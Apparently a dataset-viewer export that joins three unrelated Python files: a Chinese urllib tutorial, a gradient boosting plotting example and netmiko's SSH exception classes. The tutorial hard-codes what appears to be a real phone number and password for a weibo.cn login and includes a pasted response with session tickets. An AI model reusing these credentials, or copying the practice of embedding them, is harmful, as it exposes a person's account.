"[email protected]"
] | |
8ff0c8e47e574a3a1e3a5c08bcb4cd992a48c23a | 7fbf91c595f3adb67e29ab879a0b215581d260bf | /知识点/04-LiaoXueFeng-master/55-urllib.py | f613e42c3282f9ecbfdeb46685e8f672b48fb8c8 | [] | no_license | Randyedu/python | 69947b3836e62d0081d92591ae2acd9a54eadb9a | 5f9e7bec295ae05eadde0f661e7039c2bd08f725 | refs/heads/master | 2021-04-26T22:20:22.555128 | 2018-03-02T07:01:27 | 2018-03-02T07:01:27 | 124,074,741 | 1 | 0 | null | 2018-03-06T12:23:42 | 2018-03-06T12:23:42 | null | UTF-8 | Python | false | false | 4,701 | py | '''
urllib
urllib提供了一系列用于操作URL的功能。
urllib提供的功能就是利用程序去执行各种HTTP请求。如果要模拟浏览器完成特定功能,需要把请求伪装成浏览器。伪装的方法是先监控浏览器发出的请求,再根据浏览器的请求头来伪装,User-Agent头就是用来标识浏览器的。
'''
'''
Get
urllib的request模块可以非常方便地抓取URL内容,也就是发送一个GET请求到指定的页面,然后返回HTTP的响应:
'''
'''
# 对网页进行抓取,并返回响应:
from urllib import request
url = 'https://api.douban.com/v2/book/2129650'
with request.urlopen(url) as f:
data = f.read()
print('Status:', f.status,f.reason)
for k,v in f.getheaders():
print('%s:%s' % (k,v))
print(data.decode('utf-8'))
'''
print('----模拟浏览器发送GET请求----')
'''
如果我们要想模拟浏览器发送GET请求,就需要使用Request对象.
通过往Request对象添加HTTP头,我们就可以把请求伪装成浏览器。
例如,模拟iPhone 6去请求豆瓣首页:
'''
from urllib import request
'''
url = 'http://www.douban.com/'
req = request.Request(url)
req.add_header('User-Agent', 'Mozilla/6.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/8.0 Mobile/10A5376e Safari/8536.25')
with request.urlopen(req) as f:
print('status:',f.status,f.reason)
for k,v in f.getheaders():
print('%s:%s' % (k,v))
print(f.read().decode('utf-8'))
'''
print('----以POST发送一个请求----')
'''
Post
如果要以POST发送一个请求,只需要把参数data以bytes形式传入。
'''
# 我们模拟一个微博登录,先读取登录的邮箱和口令,然后按照weibo.cn的登录页的格式以username=xxx&password=xxx的编码传入:
from urllib import request,parse
print('Login to weibo.cn...')
email = '18767162147'
passwd = '123456'
login_data = parse.urlencode([
('username',email),
('password',passwd),
('entry','mweibo'),
('client_id',''),
('savestate','1'),
('ec',''),
('pagerefer','https://passport.weibo.cn/signin/welcome?entry=mweibo&r=http%3A%2F%2Fm.weibo.cn%2F')
])
req = request.Request('https://passport.weibo.cn/sso/login')
req.add_header('Origin', 'https://passport.weibo.cn')
req.add_header('User-Agent', 'Mozilla/6.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/8.0 Mobile/10A5376e Safari/8536.25')
req.add_header('Referer', 'https://passport.weibo.cn/signin/login?entry=mweibo&res=wel&wm=3349&r=http%3A%2F%2Fm.weibo.cn%2F')
with request.urlopen(req, data=login_data.encode('utf-8')) as f:
print('Status:',f.status,f.reason)
for k,v in f.getheaders():
print('%s:%s' % (k,v))
print('Data:',f.read().decode('utf-8'))
'''
Login to weibo.cn...
Status: 200 OK
Server:nginx/1.2.0
Date:Wed, 18 Nov 2015 01:17:48 GMT
Content-Type:text/html
Transfer-Encoding:chunked
Connection:close
Vary:Accept-Encoding
Cache-Control:no-cache, must-revalidate
Expires:Sat, 26 Jul 1997 05:00:00 GMT
Pragma:no-cache
Access-Control-Allow-Origin:https://passport.weibo.cn
Access-Control-Allow-Credentials:true
DPOOL_HEADER:dryad45
SINA-LB:aGEuOTAuZzEucXhnLmxiLnNpbmFub2RlLmNvbQ==
SINA-TS:ZGNjYTk0Y2UgMCAwIDAgNCA0ODAK
登录成功:
Data: {"retcode":20000000,"msg":"","data":{"loginresulturl":"https:\/\/passport.weibo.com\/sso\/crossdomain?entry=mweibo&action=login&proj=1&ticket=ST-MTk1NTAzMjcxNw%3D%3D-1447809422-gz-2C1D9275A244AFBEC6C3994B7615CBE0&display=0&cdurl=https%3A%2F%2Flogin.sina.com.cn%2Fsso%2Fcrossdomain%3Fentry%3Dmweibo%26action%3Dlogin%26proj%3D1%26ticket%3DST-MTk1NTAzMjcxNw%253D%253D-1447809422-gz-FE1989D8F7BC5227D9D27A1379670EF5%26display%3D0%26cdurl%3Dhttps%253A%252F%252Fpassport.sina.cn%252Fsso%252Fcrossdomain%253Fentry%253Dmweibo%2526action%253Dlogin%2526display%253D0%2526ticket%253DST-MTk1NTAzMjcxNw%25253D%25253D-1447809422-gz-057CDD10C8F2E7EB8E9797ADB86B4477","uid":"1955032717"}}
登录失败:
Data: {"retcode":50011002,"msg":"\u7528\u6237\u540d\u6216\u5bc6\u7801\u9519\u8bef","data":{"im":1,"username":"18767162147","errline":604}}
'''
'''
Handler
如果还需要更复杂的控制,比如通过一个Proxy(代理服务器)去访问网站,我们需要利用ProxyHandler来处理
'''
import urllib.request
proxy_handler = urllib.request.ProxyHandler({'http':'http://www.example.com:3128/'})
proxy_auth_handler = urllib.request.ProxyBasicAuthHandler()
proxy_auth_handler.add_password('realm','host','username','password')
opener = urllib.request.build_opener(proxy_handler,proxy_auth_handler)
with opener.open('http://www.example.com/login.html') as f:
pass
| [
"[email protected]"
] | |
09ea107626a3b50a80e9b2624651b464bff260df | 162e0e4791188bd44f6ce5225ff3b1f0b1aa0b0d | /examples/ensemble/plot_gradient_boosting_regularization.py | 30116b2be102df536f491dab433fc757a2c46506 | [] | no_license | testsleeekGithub/trex | 2af21fa95f9372f153dbe91941a93937480f4e2f | 9d27a9b44d814ede3996a37365d63814214260ae | refs/heads/master | 2020-08-01T11:47:43.926750 | 2019-11-06T06:47:19 | 2019-11-06T06:47:19 | 210,987,245 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,842 | py | """
================================
Gradient Boosting regularization
================================
Illustration of the effect of different regularization strategies
for Gradient Boosting. The example is taken from Hastie et al 2009 [1]_.
The loss function used is binomial deviance. Regularization via
shrinkage (``learning_rate < 1.0``) improves performance considerably.
In combination with shrinkage, stochastic gradient boosting
(``subsample < 1.0``) can produce more accurate models by reducing the
variance via bagging.
Subsampling without shrinkage usually does poorly.
Another strategy to reduce the variance is by subsampling the features
analogous to the random splits in Random Forests
(via the ``max_features`` parameter).
.. [1] T. Hastie, R. Tibshirani and J. Friedman, "Elements of Statistical
Learning Ed. 2", Springer, 2009.
"""
print(__doc__)
# Author: Peter Prettenhofer <[email protected]>
#
# License: BSD 3 clause
import numpy as np
import matplotlib.pyplot as plt
from mrex import ensemble
from mrex import datasets
X, y = datasets.make_hastie_10_2(n_samples=12000, random_state=1)
X = X.astype(np.float32)
# map labels from {-1, 1} to {0, 1}
labels, y = np.unique(y, return_inverse=True)
X_train, X_test = X[:2000], X[2000:]
y_train, y_test = y[:2000], y[2000:]
original_params = {'n_estimators': 1000, 'max_leaf_nodes': 4, 'max_depth': None, 'random_state': 2,
'min_samples_split': 5}
plt.figure()
for label, color, setting in [('No shrinkage', 'orange',
{'learning_rate': 1.0, 'subsample': 1.0}),
('learning_rate=0.1', 'turquoise',
{'learning_rate': 0.1, 'subsample': 1.0}),
('subsample=0.5', 'blue',
{'learning_rate': 1.0, 'subsample': 0.5}),
('learning_rate=0.1, subsample=0.5', 'gray',
{'learning_rate': 0.1, 'subsample': 0.5}),
('learning_rate=0.1, max_features=2', 'magenta',
{'learning_rate': 0.1, 'max_features': 2})]:
params = dict(original_params)
params.update(setting)
clf = ensemble.GradientBoostingClassifier(**params)
clf.fit(X_train, y_train)
# compute test set deviance
test_deviance = np.zeros((params['n_estimators'],), dtype=np.float64)
for i, y_pred in enumerate(clf.staged_decision_function(X_test)):
# clf.loss_ assumes that y_test[i] in {0, 1}
test_deviance[i] = clf.loss_(y_test, y_pred)
plt.plot((np.arange(test_deviance.shape[0]) + 1)[::5], test_deviance[::5],
'-', color=color, label=label)
plt.legend(loc='upper left')
plt.xlabel('Boosting Iterations')
plt.ylabel('Test Set Deviance')
plt.show()
| [
"[email protected]"
] | |
2c1206ff3140a312e6079a06ddf7380a15553501 | 009c1088e42cd50591946f736c30c0bad6db851b | /netmiko/ssh_exception.py | ad9e728ba282388faa4e5286d0a8f5df8748ee36 | [
"MIT"
] | permissive | hellt/netmiko | 812501b0651db920ac07e09132651eee7bdd4794 | f7ff5e6278acaecff7583518cc97bd945fceddc3 | refs/heads/master | 2021-01-18T12:45:01.751466 | 2016-11-18T23:30:44 | 2016-11-18T23:30:44 | 38,681,423 | 2 | 0 | null | 2015-07-07T10:44:21 | 2015-07-07T10:44:20 | Python | UTF-8 | Python | false | false | 380 | py | from paramiko.ssh_exception import SSHException
from paramiko.ssh_exception import AuthenticationException
class NetMikoTimeoutException(SSHException):
"""SSH session timed trying to connect to the device."""
pass
class NetMikoAuthenticationException(AuthenticationException):
"""SSH authentication exception based on Paramiko AuthenticationException."""
pass
| [
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.